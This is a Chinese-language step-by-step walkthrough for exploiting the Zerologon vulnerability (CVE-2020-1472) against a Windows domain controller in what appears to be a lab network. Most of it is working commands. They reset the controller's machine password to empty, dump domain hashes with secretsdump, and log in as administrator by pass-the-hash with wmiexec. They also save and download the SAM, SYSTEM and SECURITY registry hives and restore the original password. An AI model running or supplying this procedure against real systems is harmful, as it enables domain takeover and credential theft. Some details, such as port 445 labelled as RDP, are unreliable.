CVE-2020-1472 域内提权利用

域控（Win2008）：192.168.199.131

域用户（Win7）：192.168.199.128

域用户（Win03）：192.168.199.129

漏洞验证工具：https://github.com/SecuraBV/CVE-2020-1472

利用+重置工具：https://github.com/risksense/zerologon

重置hexpass 工具：https://github.com/dirkjanm/CVE-2020-1472

工具运行环境：https://github.com/SecureAuthCorp/impacket

1、假设已经渗透到内网

2、常见查找域的方法

（1）可以通过扫描是否开放端口：53（dns）、389（ldap）、445（rdp）

（2）通过nbtstat 命令

Usage：nbtstat -A 当前IP

Usage：ping 域.com

（3）查看systeminfo

Usage：systeminfo

（4）查看主机dns

Usage：nslookup

（5）查看当前登录域

Usage：net config workstation

3、用拉登的cs 插件扫描ldap

Usage：Ladon.exe 域地址LdapScan

Example：Ladon.exe 192.168.199.1/24 LdapScan

（图中IS_LDAP 提示192.168.199.131 是域控）

3、确定域后确定域主机名

Usage：Ladon.exe 域地址OsScan

Example：Ladon.exe 192.168.199.131 OsScan

HKServer.com\YUKONG（HKServer 是，YUKONG 是域主机名）

4、用验证脚本测试是否存在（测试存在）

Usage：python3 zerologon_tester.py 域主机名域地址

Example：python3 zerologon_tester.py YUKONG 192.168.199.131

5、再用set_empty_pw 脚本测试

Usage: set_empty_pw.py <dc-name> <dc-ip>

Example：python3 set_empty_pw.py YUKONG 192.168.199.131

大概利用方法就是把域用户密码清空，用空密码连上去dump 管理员的hash

6、利用secretsdump 脚本dump 用户hash

Usage：python3 secretsdump.py "域/主机名$"@域地址-just-dc -no-pass

Example：

python3 secretsdump.py "HKServer/YUKONG$"@192.168.199.131

-just-dc -no-pass

执行dump 可以看到YUKONG$用户的密码已经被重置成空密码，31d6cfe......

因为把域密码重置为空，所以-no-pass 就行了，在用户过多的情况下可以单独 dump administrator 的hash

命令改成：-just-dc-user "administrator" 就ok，见下图

7、利用wmiexec 脚本横向连接（连接后恢复原始hash）

Usage：

python3 wmiexec.py 域/administrator@ 域地址-hashes

aad3b435b51404eeaad3b435b51404ee:3766c17d09689c438a072a3327

0cb6f5

Example：

python3 wmiexec.py HKServer/administrator@192.168.199.131 -hashes

aad3b435b51404eeaad3b435b51404ee:3766c17d09689c438a072a3327

0cb6f5

已经连上来了，可以上cs，或者加管理员登录上去看都行，主要是恢复密码

先备份注册表（依次命令一遍）：

reg save HKLM\SYSTEM system.save

reg save HKLM\SAM sam.save

reg save HKLM\SECURITY security.save

get system.save

get sam.save

get security.save

del /f system.save

del /f sam.save

del /f security.save

（save 后缀的文件会下载到你wmiexec 脚本的同目录）

8、再用secretsdump 脚本获取原始hash

直接退出来命令：

python3 secretsdump.py -sam sam.save -system system.save -security

security.save LOCAL

9、最后用reinstall_original_pw 脚本恢复

Usage：python3 reinstall_original_pw.py 主机名域地址hash

Example：

python3 reinstall_original_pw.py YUKONG 192.168.199.131

30f90a3bfe2f085a880dcf954a8825f4

10、可能会出现没有hash 的情况，可以用restorepassword 脚本恢复hexpass

取第8 步中plan_password_hex 字段

Usage：python3 restorepassword.py DC@DC -target-ip 域地址-hexpass

值

Example ：python3 restorepassword.py YUKONG@YUKONG -target-ip

192.168.199.131 -hexpass

8dac4a096eec66839507b9018ace3e1ac2e27e4e81455eda7ee9e49d86a

2c57619740204e76571e512144a72c67d01e21a7d6b0c13ed4cebc97442

e1f9e75b6943c8fe4a67c0c8c6dfd0046624dd174b2dba468df3303a54a4

1be3f415f19f7cf25ae6f730cda6d125e5ebf480161b3bd9d4da2dca2f215f

01ba6b26603b8e36fd3bd86c3cb9ebba159da747df883125e6d00cbe105

c270c866d904b166bf6356f45572df5ed37976561da201e954074484b2d

b4462ae6c3d35fc0350feab07ea8868952fd8e84d9d5b66df6542e0f41a1e

283bb09c6cebfb2bb41fdc2b4d0a1ef8f5b2a94b2c3741c79f05c4edca170

假装有图

11、用第7 步看看是不是真的恢复了

恢复后连接3389即可